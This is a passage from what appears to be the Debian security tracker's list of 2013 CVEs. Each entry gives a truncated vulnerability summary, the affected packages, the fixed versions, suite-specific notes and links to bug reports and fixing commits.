CVE-2013-6439 (Candlepin in Red Hat Subscription Asset Manager 1.0 through 1.3 uses a ...) NOT-FOR-US: Candlepin CVE-2013-6438 (The dav_xml_get_cdata function in main/util.c in the mod_dav module in ...) {DLA-66-1} - apache2 2.4.9-1 [wheezy] - apache2 2.2.22-13+deb7u2 CVE-2013-6437 (The libvirt driver in OpenStack Compute (Nova) before 2013.2.2 and ice ...) - nova 2013.2.2 [wheezy] - nova (Vulnerable code not present) CVE-2013-6436 (The lxcDomainGetMemoryParameters method in lxc/lxc_driver.c in libvirt ...) - libvirt 1.2.0-1 [squeeze] - libvirt (vulnerable code not present, introduced in 1.1) [wheezy] - libvirt (vulnerable code not present, introduced in 1.1) CVE-2013-6435 (Race condition in RPM 4.11.1 and earlier allows remote attackers to ex ...) {DSA-3129-1 DLA-140-1} - rpm 4.11.3-1.1 (bug #773101) NOTE: https://bugzilla.redhat.com/show_bug.cgi?id=1039811 CVE-2013-6434 (The remote-viewer in Red Hat Enterprise Virtualization Manager (RHEV-M ...) NOT-FOR-US: RHEV Manager CVE-2013-6433 (The default configuration in the Red Hat openstack-neutron package bef ...) - quantum [wheezy] - quantum (Minor issue) - neutron 2014.1-1 NOTE: Likely fixed even earlier than 2014.1-1, but that was the oldest version checked CVE-2013-6432 (The ping_recvmsg function in net/ipv4/ping.c in the Linux kernel befor ...) - linux 3.12.6-1 [wheezy] - linux (Vulnerable code introduced in 3.11) - linux-2.6 (Vulnerable code introduced in 3.11) NOTE: Introduced by https://git.kernel.org/linus/6d0bfe22611602f36617bc7aa2ffa1bbb2f54c67 NOTE: fixed by https://git.kernel.org/linus/cf970c002d270c36202bd5b9c2804d3097a52da0 CVE-2013-6431 (The fib6_add function in net/ipv6/ip6_fib.c in the Linux kernel before ...) - linux-2.6 (Vulnerable code not present) - linux 3.11.5-1 (low) [wheezy] - linux (Vulnerable code not present) NOTE: fixed by https://git.kernel.org/linus/ae7b4e1f213aa659aedf9c6ecad0bf5f0476e1e2 CVE-2013-6430 (The JavaScriptUtils.javaScriptEscape method in web/util/JavaScriptUtil ...) {DSA-2857-1} - libspring-java 3.0.6.RELEASE-11 (bug #735420) CVE-2013-6429 (The SourceHttpMessageConverter in Spring MVC in Spring Framework befor ...) {DSA-2857-1} - libspring-java 3.0.6.RELEASE-11 (bug #735420) CVE-2013-6428 (The ReST API in OpenStack Orchestration API (Heat) before Havana 2013. ...) - heat 2013.2.1-1 (bug #732033) NOTE: https://launchpad.net/bugs/1256983 CVE-2013-6427 (upgrade.py in the hp-upgrade service in HP Linux Imaging and Printing ...) {DSA-2829-1} - hplip 3.13.11-2 (bug #731480) [squeeze] - hplip (Vulnerable code not present) NOTE: https://bugzilla.suse.com/show_bug.cgi?id=853405 CVE-2013-6426 (The cloudformation-compatible API in OpenStack Orchestration API (Heat ...) - heat 2013.2.1-1 (bug #732033) NOTE: https://launchpad.net/bugs/1256049 CVE-2013-6425 (Integer underflow in the pixman_trapezoid_valid macro in pixman.h in P ...) {DSA-2823-1} - pixman 0.30.2-2 CVE-2013-6424 (Integer underflow in the xTrapezoidValid macro in render/picture.h in ...) {DSA-2822-1} - xorg-server 2:1.14.2.901-1 (low; bug #742922) NOTE: Band-aid fix in Wheezy not applicable to upstream code, fixed post-Wheezy NOTE: in pixman: http://cgit.freedesktop.org/pixman/commit/?id=5e14da97f16e421d084a9e735be21b1025150f0c NOTE: Mark the first post-wheezy xorg-server as a pseudo fixed version CVE-2013-6423 RESERVED CVE-2013-6422 (The GnuTLS backend in libcurl 7.21.4 through 7.33.0, when disabling di ...) {DSA-2824-1} - curl 7.34.0-1 [squeeze] - curl (issue introduced with 59cf93cc, 7.21.4) CVE-2013-6421 (The unpack_zip function in archive_unpacker.rb in the sprout gem 0.7.2 ...) NOT-FOR-US: Ruby Gem sprout CVE-2013-6420 (The asn1_time_to_time_t function in ext/openssl/openssl.c in PHP befor ...) {DSA-2816-1} - php5 5.5.6+dfsg-2 (bug #731895) NOTE: https://git.php.net/?p=php-src.git;a=commit;h=c1224573c773b6845e83505f717fbf820fc18415 CVE-2013-6419 (Interaction error in OpenStack Nova and Neutron before Havana 2013.2.1 ...) - neutron 2013.2.1-1 - nova 2013.2.1-1 [wheezy] - nova (Only exploitable in combination in neutron, not in Wheezy) NOTE: https://launchpad.net/bugs/1235450 CVE-2013-6418 (PyWBEM 0.7 and earlier uses a separate connection to validate X.509 ce ...) - pywbem 0.8.0~dev650-1 (low; bug #732594) [squeeze] - pywbem (Minor issue) [wheezy] - pywbem (Minor issue) NOTE: fix: https://bugzilla.redhat.com/attachment.cgi?id=851357 CVE-2013-6417 (actionpack/lib/action_dispatch/http/request.rb in Ruby on Rails before ...) {DSA-2888-1} - rails-4.0 4.0.2+dfsg-1 (bug #731290) - rails-3.2 3.2.16-3+0 - ruby-actionpack-3.2 3.2.16-1 (bug #731288) - ruby-actionpack-2.3 (vulnerable code not present) - rails (vulnerable code not present) NOTE: Starting with 2.3.14.1 rails is a transition package NOTE: CVE for incomplete fix for CVE-2013-0155 CVE-2013-6416 (Cross-site scripting (XSS) vulnerability in the simple_format helper i ...) - rails-4.0 4.0.2+dfsg-1 (bug #731290) - ruby-actionpack-3.2 (vulnerable code not present) - ruby-actionpack-2.3 (vulnerable code not present) - rails (vulnerable code not present) NOTE: Starting with 2.3.14.1 rails is a transition package CVE-2013-6415 (Cross-site scripting (XSS) vulnerability in the number_to_currency hel ...) {DSA-2888-1} - rails-4.0 4.0.2+dfsg-1 (bug #731290) - rails-3.2 3.2.16-3+0 - ruby-actionpack-3.2 3.2.16-1 (bug #731288) - ruby-actionpack-2.3 (bug #731289) [wheezy] - ruby-actionpack-2.3 - rails (vulnerable code not present) NOTE: Starting with 2.3.14.1 rails is a transition package CVE-2013-6414 (actionpack/lib/action_view/lookup_context.rb in Action View in Ruby on ...) {DSA-2888-1} - rails-4.0 4.0.2+dfsg-1 (bug #731290) - rails-3.2 3.2.16-3+0 - ruby-actionpack-3.2 3.2.16-1 (bug #731288) - ruby-actionpack-2.3 (vulnerable code not present) - rails (vulnerable code not present) NOTE: Starting with 2.3.14.1 rails is a transition package CVE-2013-6413 (Use-after-free vulnerability in UnrealIRCd 3.2.10 before 3.2.10.2 allo ...) - unrealircd (bug #515130) NOTE: http://forums.unrealircd.com/viewtopic.php?f=2&t=8221 CVE-2013-6412 (The transform_save function in transform.c in Augeas 1.0.0 through 1.1 ...) {DLA-28-1} - augeas 1.2.0-0.1 (bug #731111) [wheezy] - augeas (Affected patch not present/applied) [squeeze] - augeas (Affected patch not present/applied) NOTE: only if applied original patch for CVE-2012-0786 CVE-2013-6411 (The HandleCrashedAircraft function in aircraft_cmd.cpp in OpenTTD 0.3. ...) - openttd 1.3.3-1 (low) [squeeze] - openttd 1.0.4-7 [wheezy] - openttd 1.2.1-3 NOTE: http://bugs.openttd.org/task/5820 CVE-2013-6410 (nbd-server in Network Block Device (nbd) before 3.5 does not properly ...) {DSA-2806-1} - nbd 1:3.5-1 NOTE: http://anonscm.debian.org/gitweb/?p=users/wouter/nbd.git;a=commitdiff;h=0e9bd98c44dd94d9ede92655a36849fbc8cbf5b9 CVE-2013-6409 (Debian adequate before 0.8.1, when run by root with the --user option, ...) - adequate 0.8.1 (bug #730691) NOTE: https://bitbucket.org/jwilk/adequate/commits/94e5fc5d810057bffb673501ed809f7c2dabd9ee CVE-2013-6408 (The DocumentAnalysisRequestHandler in Apache Solr before 4.3.1 does no ...) {DSA-2963-1} - lucene-solr 3.6.2+dfsg-2 (bug #731113) NOTE: https://issues.apache.org/jira/browse/SOLR-4881 CVE-2013-6407 (The UpdateRequestHandler for XML in Apache Solr before 4.1 allows remo ...) {DSA-2963-1} - lucene-solr 3.6.2+dfsg-2 (bug #731113) NOTE: https://issues.apache.org/jira/browse/SOLR-3895 CVE-2013-6406 REJECTED CVE-2013-6405 REJECTED CVE-2013-6404 (Quassel core (server daemon) in Quassel IRC before 0.9.2 does not prop ...) - quassel 0.9.2-1 (low) [wheezy] - quassel 0.8.0-1+deb7u1 [squeeze] - quassel (Minor issue) NOTE: https://github.com/quassel/quassel/commit/a1a24da CVE-2013-6403 (The admin page in ownCloud before 5.0.13 allows remote attackers to by ...) - owncloud 5.0.13+dfsg-1 CVE-2013-6402 (base/pkit.py in HP Linux Imaging and Printing (HPLIP) through 3.13.11 ...) {DSA-2829-1} - hplip 3.13.11-2.1 (bug #725876) NOTE: https://bugzilla.suse.com/show_bug.cgi?id=852368 CVE-2013-6401 (Jansson, possibly 2.4 and earlier, does not restrict the ability to tr ...) - jansson 2.6-1 (bug #738647) [wheezy] - jansson (Minor issue) CVE-2013-6400 (Xen 4.2.x and 4.3.x, when using Intel VT-d and a PCI device has been a ...) - xen 4.4.0-1 [wheezy] - xen (4.2.x and later are vulnerable) [squeeze] - xen (4.2.x and later are vulnerable) CVE-2013-6399 (Array index error in the virtio_load function in hw/virtio/virtio.c in ...) - qemu 2.1+dfsg-1 (low; bug #739589) [squeeze] - qemu (Minor issue, hardly exploitable in practice) [wheezy] - qemu (Minor issue, hardly exploitable in practice) [wheezy] - qemu-kvm (Minor issue, hardly exploitable in practice) - qemu-kvm (low) [squeeze] - qemu-kvm (Minor issue, hardly exploitable in practice) CVE-2013-6398 (The virtual router in Apache CloudStack before 4.2.1 does not preserve ...) NOT-FOR-US: Apache CloudStack CVE-2013-6397 (Directory traversal vulnerability in SolrResourceLoader in Apache Solr ...) {DSA-2963-1} - lucene-solr 3.6.2+dfsg-2 (bug #731113) NOTE: https://issues.apache.org/jira/browse/SOLR-4882 CVE-2013-6396 (The OpenStack Python client library for Swift (python-swiftclient) 1.0 ...) - python-swiftclient 1:2.0.2-1 (bug #730626) NOTE: https://bugs.launchpad.net/python-swiftclient/+bug/1199783 CVE-2013-6395 (Cross-site scripting (XSS) vulnerability in header.php in Ganglia Web ...) - ganglia-web 3.6.1-1 (unimportant; bug #730507) [squeeze] - ganglia (Vulnerable code not present) NOTE: See README.Debian.security, only supported behind an authenticated HTTP zone, #702776 - ganglia 3.6.0-1 [wheezy] - ganglia (Minor issue) NOTE: ganglia-web and ganglia are now two separate source packages NOTE: starting with 3.6.0-1 the web front is no longer built from src:ganglia so marking this version as fixed NOTE: https://github.com/ganglia/ganglia-web/issues/218 NOTE: https://github.com/ganglia/ganglia-web/commit/fbdf26542510c01931dac7856bb908f651ad05e6 CVE-2013-6394 (Percona XtraBackup before 2.1.6 uses a constant string for the initial ...) - percona-xtrabackup 2.1.6-2 (bug #730544) CVE-2013-6393 (The yaml_parser_scan_tag_uri function in scanner.c in LibYAML before 0 ...) {DSA-2870-1 DSA-2850-1} - libyaml 0.1.4-3 (bug #737076) - libyaml-libyaml-perl 0.41-4 CVE-2013-6392 (The genlock_dev_ioctl function in genlock.c in the Genlock driver for ...) - linux-2.6 (Android-specific) - linux (Android-specific) NOTE: https://www.codeaurora.org/cgit/quic/la/kernel/msm/commit/drivers/base/genlock.c?id=e3c43027bdb59f03eec7ead0a01c77e4bf801625&h=jb_3.2.3 CVE-2013-6391 (The ec2tokens API in OpenStack Identity (Keystone) before Havana 2013. ...) - keystone 2013.2.1-1 (bug #731981) [wheezy] - keystone (vulnerable code not present) NOTE: https://launchpad.net/bugs/1242597 CVE-2013-6390 RESERVED CVE-2013-6389 (Open redirect vulnerability in the Overlay module in Drupal 7.x before ...) {DSA-2804-1} - drupal7 7.24-1 CVE-2013-6388 (Cross-site scripting (XSS) vulnerability in the Color module in Drupal ...) {DSA-2804-1} - drupal7 7.24-1 CVE-2013-6387 (Cross-site scripting (XSS) vulnerability in the Image module in Drupal ...) {DSA-2804-1} - drupal7 7.24-1 CVE-2013-6386 (Drupal 6.x before 6.29 and 7.x before 7.24 uses the PHP mt_rand functi ...) {DSA-2828-1 DSA-2804-1} - drupal6 - drupal7 7.24-1 NOTE: https://drupal.org/SA-CORE-2013-003 CVE-2013-6385 (The form API in Drupal 6.x before 6.29 and 7.x before 7.24, when used ...) {DSA-2828-1 DSA-2804-1} - drupal6 - drupal7 7.24-1 NOTE: https://drupal.org/SA-CORE-2013-003 CVE-2013-6384 ((1) impl_db2.py and (2) impl_mongodb.py in OpenStack Ceilometer 2013.2 ...) - ceilometer 2013.2-4 (bug #730227) CVE-2013-6383 (The aac_compat_ioctl function in drivers/scsi/aacraid/linit.c in the L ...) {DSA-2906-1} - linux-2.6 [wheezy] - linux 3.2.53-1 - linux 3.11.8-1 NOTE: https://git.kernel.org/linus/f856567b930dfcdbc3323261bf77240ccdde01f5 CVE-2013-6382 (Multiple buffer underflows in the XFS implementation in the Linux kern ...) {DSA-2906-1} - linux-2.6 (low) - linux 3.11.10-1 (low) [wheezy] - linux 3.2.53-1 CVE-2013-6381 (Buffer overflow in the qeth_snmp_command function in drivers/s390/net/ ...) {DSA-2906-1} - linux-2.6 (low) - linux 3.11.10-1 (low) [wheezy] - linux 3.2.53-1 NOTE: https://git.kernel.org/linus/6fb392b1a63ae36c31f62bc3fc8630b49d602b62 CVE-2013-6380 (The aac_send_raw_srb function in drivers/scsi/aacraid/commctrl.c in th ...) {DSA-2906-1} - linux-2.6 - linux 3.11.10-1 [wheezy] - linux 3.2.53-1 NOTE: https://git.kernel.org/linus/b4789b8e6be3151a955ade74872822f30e8cd914 CVE-2013-6379 REJECTED CVE-2013-6378 (The lbs_debugfs_write function in drivers/net/wireless/libertas/debugf ...) {DSA-2906-1} - linux-2.6 (low) - linux 3.11.10-1 (low) [wheezy] - linux 3.2.53-1 NOTE: https://git.kernel.org/linus/a497e47d4aec37aaf8f13509f3ef3d1f6a717d88 CVE-2013-6377 REJECTED CVE-2013-6376 (The recalculate_apic_map function in arch/x86/kvm/lapic.c in the KVM s ...) - linux 3.12.5-1 [wheezy] - linux (Introduced in 3.7) - linux-2.6 (Introduced in 3.7) CVE-2013-6375 (Xen 4.2.x and 4.3.x, when using Intel VT-d for PCI passthrough, does n ...) - xen 4.4.0-1 (bug #730254) [squeeze] - xen (Only affects >= 4.2) [wheezy] - xen (Only affects >= 4.2) CVE-2013-6374 (Cross-site scripting (XSS) vulnerability in the Build Failure Analyzer ...) - jenkins (Affected plugins are not shipped in Debian, bug #730457) CVE-2013-6373 (The Exclusion plugin before 0.9 for Jenkins does not properly prevent ...) - jenkins (Affected plugins are not shipped in Debian, bug #730457) CVE-2013-6372 (The Subversion plugin before 1.54 for Jenkins stores credentials using ...) - jenkins (Affected plugins are not shipped in Debian, bug #730457) CVE-2013-6371 (The hash functionality in json-c before 0.12 allows context-dependent ...) - json-c 0.11-4 (bug #744008) [wheezy] - json-c (Minor issue) [squeeze] - json-c (Minor issue) NOTE: https://github.com/json-c/json-c/commit/64e36901a0614bf64a19bc3396469c66dcd0b015 CVE-2013-6370 (Buffer overflow in the printbuf APIs in json-c before 0.12 allows remo ...) - json-c 0.11-4 (bug #744008) [wheezy] - json-c (Minor issue) [squeeze] - json-c (Minor issue) NOTE: https://github.com/json-c/json-c/commit/64e36901a0614bf64a19bc3396469c66dcd0b015 CVE-2013-6369 (Stack-based buffer overflow in the jbg_dec_in function in libjbig/jbig ...) {DSA-2900-1} - jbigkit 2.0-2.1 (bug #743960) CVE-2013-6368 (The KVM subsystem in the Linux kernel through 3.12.5 allows local user ...) - linux 3.12.5-1 [squeeze] - linux-2.6 (Too intrusive to backport, KVM server not supported in squeeze-lts) - linux-2.6 [wheezy] - linux 3.2.54-1 CVE-2013-6367 (The apic_get_tmcct function in arch/x86/kvm/lapic.c in the KVM subsyst ...) {DSA-2906-1} - linux 3.12.5-1 - linux-2.6 [wheezy] - linux 3.2.54-1 CVE-2013-6363 RESERVED CVE-2013-6362 (Xerox ColorCube and WorkCenter devices in 2013 had hardcoded FTP and s ...) NOT-FOR-US: Xerox CVE-2013-6361 RESERVED CVE-2013-6360 (TRENDnet TS-S402 has a backdoor to enable TELNET. ...) NOT-FOR-US: TRENDnet CVE-2013-6359 (Munin::Master::Node in Munin before 2.0.18 allows remote attackers to ...) {DSA-2815-1 DLA-20-1} - munin 2.0.18-1 [squeeze] - munin 1.4.5-3+deb6u1 NOTE: http://munin-monitoring.org/ticket/1397 CVE-2013-6358 (PrestaShop 1.5.5 allows remote authenticated attackers to execute arbi ...) NOT-FOR-US: PrestaShop CVE-2013-6357 (** DISPUTED ** Cross-site request forgery (CSRF) vulnerability in the ...) NOT-FOR-US: Disputed non-issue in Tomcat CVE-2013-6356 REJECTED CVE-2013-6355 REJECTED CVE-2013-6354 RESERVED CVE-2013-6353 RESERVED CVE-2013-6352 RESERVED CVE-2013-6351 RESERVED CVE-2013-6350 RESERVED CVE-2013-6349 (McAfee Email Gateway (MEG) 7.0 before 7.0.4 and 7.5 before 7.5.1 allow ...) NOT-FOR-US: McAfee Email Gateway CVE-2013-6348 (Multiple cross-site scripting (XSS) vulnerabilities in Apache Struts 2 ...) - libstruts1.2-java (Affects Struts 2.0.0 - Struts 2.3.15.3) NOTE: https://issues.apache.org/jira/browse/WW-4213 CVE-2013-6347 (Session fixation vulnerability in Novell ZENworks Configuration Manage ...) NOT-FOR-US: Novell ZENworks Configuration Management CVE-2013-6346 (Cross-site request forgery (CSRF) vulnerability in the ZCC page in Nov ...) NOT-FOR-US: Novell ZENworks Configuration Management CVE-2013-6345 (Unspecified vulnerability in the ZCC page in Novell ZENworks Configura ...) NOT-FOR-US: Novell ZENworks Configuration Management CVE-2013-6344 (The ZCC page in Novell ZENworks Configuration Management (ZCM) before ...) NOT-FOR-US: Novell ZENworks Configuration Management CVE-2013-6343 (Multiple buffer overflows in web.c in httpd on the ASUS RT-N56U and RT ...) NOT-FOR-US: ASUS Router CVE-2013-6342 (Cross-site scripting (XSS) vulnerability in the Tweet Blender plugin b ...) NOT-FOR-US: Tweet Blender plugin for WP CVE-2013-6341 (SQL injection vulnerability in Dokeos 2.2 RC2 and earlier allows remot ...) NOT-FOR-US: Dokeos CVE-2013-6366 (The Groovy script console in VMware Hyperic HQ 4.6.6 allows remote aut ...) NOT-FOR-US: VMware Hyperic HQ CVE-2013-6365 (Horde Groupware Web mail 5.1.2 has CSRF with requests to change permis ...) - php-horde 5.1.5+debian0-1 (bug #730110) - php-horde-kronolith 4.1.4-1 (bug #730980) - kronolith2 (Vulnerable code not present) - horde3 [squeeze] - horde3 (Unsupported in squeeze-lts) NOTE: https://github.com/horde/horde/commit/b79114d08ee8c8e43e74a179741749529f6d885c CVE-2013-6364 (Horde Groupware Webmail Edition has CSRF and XSS when saving search as ...) - php-horde (Vulnerable code in turba) - php-horde-turba 4.1.3-1 (bug #730979) - turba2 [squeeze] - turba2 (Unsupported in squeeze-lts) NOTE: https://github.com/horde/horde/commit/74f9add4ad86c29b608270e33b17426163b3c8cf CVE-2013-6340 (epan/dissectors/packet-tcp.c in the TCP dissector in Wireshark 1.8.x b ...) {DSA-2792-1} - wireshark 1.10.3-1 NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=9263 CVE-2013-6339 (The dissect_openwire_type function in epan/dissectors/packet-openwire. ...) {DLA-497-1} - wireshark 1.10.3-1 (unimportant) [squeeze] - wireshark (OpenWire dissector introduced in 1.8.0) NOTE: Not suitable for code injection CVE-2013-6338 (The dissect_sip_common function in epan/dissectors/packet-sip.c in the ...) {DSA-2792-1} - wireshark 1.10.3-1 [squeeze] - wireshark (Vulnerable code not present) NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=9228 CVE-2013-6337 (Unspecified vulnerability in the NBAP dissector in Wireshark 1.8.x bef ...) {DSA-2792-1} - wireshark 1.10.3-1 [squeeze] - wireshark (Vulnerable code not present) NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=9168 not accessible CVE-2013-6336 (The ieee802154_map_rec function in epan/dissectors/packet-ieee802154.c ...) {DSA-2792-1} - wireshark 1.10.3-1 [squeeze] - wireshark (code introduced in 1.6.0) NOTE: http://anonsvn.wireshark.org/viewvc?view=revision&revision=52036 CVE-2013-6335 (The Backup-Archive client in IBM Tivoli Storage Manager (TSM) for Spac ...) NOT-FOR-US: IBM Tivoli Storage Manager CVE-2013-6334 (IBM Atlas eDiscovery Process Management 6.0.1.5 and earlier and 6.0.2, ...) NOT-FOR-US: IBM CVE-2013-6333 (Cross-site scripting (XSS) vulnerability in IBM Algo One, as used in M ...) NOT-FOR-US: IBM Algo One CVE-2013-6332 (Unrestricted file upload vulnerability in IBM Algo One UDS 4.7.0 throu ...) NOT-FOR-US: IBM Algo One UDS CVE-2013-6331 (SQL injection vulnerability in IBM Algo One, as used in MetaData Manag ...) NOT-FOR-US: IBM Algo One CVE-2013-6330 (IBM WebSphere Application Server 7.x before 7.0.0.31, when simpleFileS ...) NOT-FOR-US: IBM WebSphere CVE-2013-6329 (IBM Global Security Kit (aka GSKit), as used in Content Manager OnDema ...) NOT-FOR-US: IBM Global Security Kit CVE-2013-6328 (Cross-site scripting (XSS) vulnerability in the Web Content Manager (W ...) NOT-FOR-US: IBM WebSphere Portal CVE-2013-6327 (Cross-site scripting (XSS) vulnerability in the HTTP Option in IBM Ste ...) NOT-FOR-US: IBM CVE-2013-6326 RESERVED CVE-2013-6325 (IBM WebSphere Application Server 7.x before 7.0.0.31, 8.0.x before 8.0 ...) NOT-FOR-US: IBM WebSphere Application Server CVE-2013-6324 RESERVED CVE-2013-6323 (Cross-site scripting (XSS) vulnerability in the Administration Console ...) NOT-FOR-US: IBM WebSphere Application Server CVE-2013-6322 (Cross-site scripting (XSS) vulnerability in Sterling Order Management ...) NOT-FOR-US: IBM Sterling Selling and Fulfillment Suite CVE-2013-6321 (SQL injection vulnerability in IBM Atlas eDiscovery Process Management ...) NOT-FOR-US: IBM Atlas eDiscovery Process Management CVE-2013-6320 (Cross-site scripting (XSS) vulnerability in IBM Algo One, as used in M ...) NOT-FOR-US: IBM Algo One CVE-2013-6319 (IBM Algo One, as used in MetaData Management Tools in UDS 4.7.0 throug ...) NOT-FOR-US: IBM Algo One CVE-2013-6318 (Cross-site scripting (XSS) vulnerability in IBM Algo One, as used in M ...) NOT-FOR-US: IBM Algo One CVE-2013-6317 RESERVED CVE-2013-6316 (IBM WebSphere Portal 7.0.0.x before 7.0.0.2 CF26 and 8.0.0.x before 8. ...) NOT-FOR-US: IBM WebSphere Portal CVE-2013-6315 (IBM InfoSphere Enterprise Records 4.5.1 before 4.5.1.7-IER-IF001 and E ...) NOT-FOR-US: IBM InfoSphere Enterprise Records CVE-2013-6314 (Cross-site scripting (XSS) vulnerability in IBM InfoSphere Enterprise ...) NOT-FOR-US: IBM InfoSphere Enterprise Records CVE-2013-6313 RESERVED CVE-2013-6312 (Unspecified vulnerability in IBM Rational Service Tester 8.3.x and 8.5 ...) NOT-FOR-US: IBM CVE-2013-6311 (SQL injection vulnerability in IBM Marketing Platform 9.1 before FP2 a ...) NOT-FOR-US: IBM Marketing Platform CVE-2013-6310 (Cross-site scripting (XSS) vulnerability in IBM Marketing Platform 9.1 ...) NOT-FOR-US: IBM Marketing Platform CVE-2013-6309 (IBM Marketing Platform 9.1 before FP2 allows remote authenticated user ...) NOT-FOR-US: IBM Marketing Platform CVE-2013-6308 (IBM Marketing Platform 9.1 before FP2 allows remote authenticated user ...) NOT-FOR-US: IBM Marketing Platform CVE-2013-6307 (Cross-site scripting (XSS) vulnerability in IBM Security QRadar SIEM 7 ...) NOT-FOR-US: IBM Security QRadar SIEM CVE-2013-6306 (Unspecified vulnerability on IBM Power 7 Systems 740 before 740.70 01A ...) NOT-FOR-US: IBM Power 7 CVE-2013-6305 (IBM Platform Symphony 5.2 before build 229037 and 6.1.0.1 before build ...) NOT-FOR-US: IBM Platform Symphony CVE-2013-6304 (Multiple directory traversal vulnerabilities in Algo Risk Application ...) NOT-FOR-US: IBM Algo One CVE-2013-6303 (Directory traversal vulnerability in IBM Algo One, as used in MetaData ...) NOT-FOR-US: IBM Algo One CVE-2013-6302 (SQL injection vulnerability in IBM Algo One, as used in MetaData Manag ...) NOT-FOR-US: IBM Algo One CVE-2013-6301 (Cross-site scripting (XSS) vulnerability in IBM Algo One, as used in M ...) NOT-FOR-US: IBM Algo One CVE-2013-6300 (Cross-site scripting (XSS) vulnerability in IBM Algo One, as used in M ...) NOT-FOR-US: IBM Algo One CVE-2013-6299 (Cross-site scripting (XSS) vulnerability in IBM Algo One, as used in M ...) NOT-FOR-US: IBM Algo One CVE-2013-6298 RESERVED CVE-2013-6297 RESERVED CVE-2013-6296 RESERVED CVE-2013-6295 (PrestaShop 1.5.5 vulnerable to privilege escalation via a Salesman acc ...) NOT-FOR-US: PrestaShop CVE-2013-6294 RESERVED CVE-2013-6293 RESERVED CVE-2013-6292 RESERVED CVE-2013-6291 RESERVED CVE-2013-6290 RESERVED CVE-2013-6287 RESERVED CVE-2013-6286 RESERVED CVE-2013-6284 (Unspecified vulnerability in the Statutory Reporting for Insurance (FS ...) NOT-FOR-US: Financial Services module for SAP ERP Central Component CVE-2013-6283 (VideoLAN VLC Media Player 2.0.8 and earlier allows remote attackers to ...) - vlc 2.1.0-2 (unimportant) [squeeze] - vlc (Unsupported in squeeze-lts) NOTE: User-assisted DoS for X session (freezes window manager) in 2.0.3-5 CVE-2013-6282 (The (1) get_user and (2) put_user API functions in the Linux kernel be ...) - linux 3.6.4-1~experimental.1 - linux-2.6 (Introduced in 2.6.38) [wheezy] - linux 3.2.53-1 NOTE: https://www.codeaurora.org/projects/security-advisories/missing-access-checks-putusergetuser-kernel-api-cve-2013-6282 NOTE: https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/arch/arm/include/asm/uaccess.h?id=8404663f81d212918ff85f493649a7991209fa04 CVE-2013-6281 (Cross-site scripting (XSS) vulnerability in codebase/spreadsheet.php i ...) NOT-FOR-US: Wordpress plugin CVE-2013-6280 (Cross-site scripting (XSS) vulnerability in Social Sharing Toolkit plu ...) NOT-FOR-US: Wordpress plugin CVE-2013-6279 RESERVED CVE-2013-6278 RESERVED CVE-2013-6277 (QNAP VioCard 300 has hardcoded RSA private keys. ...) NOT-FOR-US: QNAP CVE-2013-6276 RESERVED CVE-2013-6274 RESERVED CVE-2013-6273 RESERVED CVE-2013-6272 (The NotificationBroadcastReceiver class in the com.android.phone proce ...) NOT-FOR-US: Android CVE-2013-6271 (Android 4.0 through 4.3 allows attackers to bypass intended access res ...) NOT-FOR-US: Android CVE-2013-6270 RESERVED CVE-2013-6269 RESERVED CVE-2013-6268 RESERVED CVE-2013-6267 (Multiple cross-site scripting (XSS) vulnerabilities in Claroline befor ...) NOT-FOR-US: Claroline CVE-2013-6266 REJECTED CVE-2013-6265 REJECTED CVE-2013-6264 REJECTED CVE-2013-6263 REJECTED CVE-2013-6262 REJECTED CVE-2013-6261 REJECTED CVE-2013-6260 REJECTED CVE-2013-6259 REJECTED CVE-2013-6258 REJECTED CVE-2013-6257 REJECTED CVE-2013-6256 REJECTED CVE-2013-6255 REJECTED CVE-2013-6254 REJECTED CVE-2013-6253 REJECTED CVE-2013-6252 REJECTED CVE-2013-6251 REJECTED CVE-2013-6250 REJECTED CVE-2013-6249 REJECTED CVE-2013-6248 REJECTED CVE-2013-6247 REJECTED CVE-2013-6246 (The Dell Quest One Password Manager, possibly 5.0, allows remote attac ...) NOT-FOR-US: Dell Quest One Password Manager CVE-2013-6245 (Unspecified vulnerability in SAP Sybase Adaptive Server Enterprise (AS ...) NOT-FOR-US: SAP Sybase Adaptive Server Enterprise CVE-2013-6244 (The Live Update webdynpro application (webdynpro/dispatcher/sap.com/tc ...) NOT-FOR-US: SAP NetWeaver CVE-2013-6289 (Cross-site scripting (XSS) vulnerability in the Apache Solr for TYPO3 ...) NOT-FOR-US: TYPO3 extension Apache Solr CVE-2013-6288 (Unspecified vulnerability in the Apache Solr for TYPO3 (solr) extensio ...) NOT-FOR-US: TYPO3 extension Apache Solr CVE-2013-6285 (The search component in the Treasurer application in Tyler Technologie ...) NOT-FOR-US: Tyler Technologies TaxWeb CVE-2013-6275 (Multiple CSRF issues in Horde Groupware Webmail Edition 5.1.2 and earl ...) - php-horde-ingo 3.1.3-1 (bug #727669) - ingo1 (Affected code not present) CVE-2013-6242 (Cross-site scripting (XSS) vulnerability in the frontend in Open-Xchan ...) NOT-FOR-US: Open-Xchange CVE-2013-6241 (The Birthday widget in the backend in Open-Xchange (OX) AppSuite 7.2.x ...) NOT-FOR-US: Open-Xchange CVE-2013-6240 RESERVED CVE-2013-6239 (Cross-site scripting (XSS) vulnerability in the photo gallery model in ...) NOT-FOR-US: Exis Contexis CVE-2013-6238 RESERVED CVE-2013-6237 (The ISL Desktop plugin for Windows before 1.4.7 for ISL Light 3.5.4 an ...) NOT-FOR-US: ISL Light CVE-2013-6236 (IZON IP 2.0.2: hard-coded password vulnerability ...) NOT-FOR-US: Stem Innovations IZON CVE-2013-6235 (Multiple cross-site scripting (XSS) vulnerabilities in JAMon (Java App ...) - libjamon-java (jamon.war/JAMon web apps gets excluded by debian/orig-tar.sh) NOTE: http://seclists.org/bugtraq/2014/Jan/92 CVE-2013-6234 (Unrestricted file upload vulnerability in the Worksheet designer in Sp ...) NOT-FOR-US: SpagoBI CVE-2013-6233 (Cross-site scripting (XSS) vulnerability in SpagoBI before 4.1 allows ...) NOT-FOR-US: SpagoBI CVE-2013-6232 (Cross-site scripting (XSS) vulnerability in SpagoBI before 4.1 allows ...) NOT-FOR-US: SpagoBI CVE-2013-6231 (SpagoBI before 4.1 has Privilege Escalation via an error in the Adapte ...) NOT-FOR-US: SpagoBI CVE-2013-6230 (The Winsock WSAIoctl API in Microsoft Windows Server 2008, as used in ...) - bind9 (Affects only Windows systems) NOTE: https://kb.isc.org/article/AA-01062 CVE-2013-6229 (Multiple cross-site scripting (XSS) vulnerabilities in Atmail Webmail ...) - atmailopen 